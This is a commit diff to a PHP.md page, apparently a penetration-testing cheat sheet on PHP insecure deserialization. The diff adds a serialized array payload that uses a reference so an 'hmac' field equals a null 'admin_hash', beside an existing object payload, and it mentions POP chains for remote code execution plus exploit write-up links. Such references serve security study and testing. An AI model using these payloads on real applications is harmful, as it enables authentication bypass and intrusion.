Update PHP.md
parent
0a01854a6a
commit
992732877f
|
@ -111,6 +111,12 @@ Payload:
|
|||
O:6:"Object":2:{s:10:"secretCode";N;s:4:"guess";R:2;}
|
||||
```
|
||||
|
||||
We can do an array to like this:
|
||||
|
||||
```php
|
||||
a:2:{s:10:"admin_hash";N;s:4:"hmac";R:2;}
|
||||
```
|
||||
|
||||
## Finding and using gadgets
|
||||
|
||||
Also called "PHP POP Chains", they can be used to gain RCE on the system.
|
||||
|
@ -193,4 +199,4 @@ $poc->stopBuffering();
|
|||
* [Jack The Ripper Web challeneg Write-up from ECSC 2019 Quals Team France by Rawsec](https://rawsec.ml/en/ecsc-2019-quals-write-ups/#164-Jack-The-Ripper-Web)
|
||||
* [Rusty Joomla RCE Unserialize overflow](https://blog.hacktivesecurity.com/index.php?controller=post&action=view&id_post=41)
|
||||
* [PHP Pop Chains - Achieving RCE with POP chain exploits. - Vickie Li - September 3, 2020](https://vkili.github.io/blog/insecure%20deserialization/pop-chains/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
* [How to exploit the PHAR Deserialization Vulnerability - Alexandru Postolache - May 29, 2020](https://pentest-tools.com/blog/exploit-phar-deserialization-vulnerability/)
|
||||
|
|
Loading…
Reference in New Issue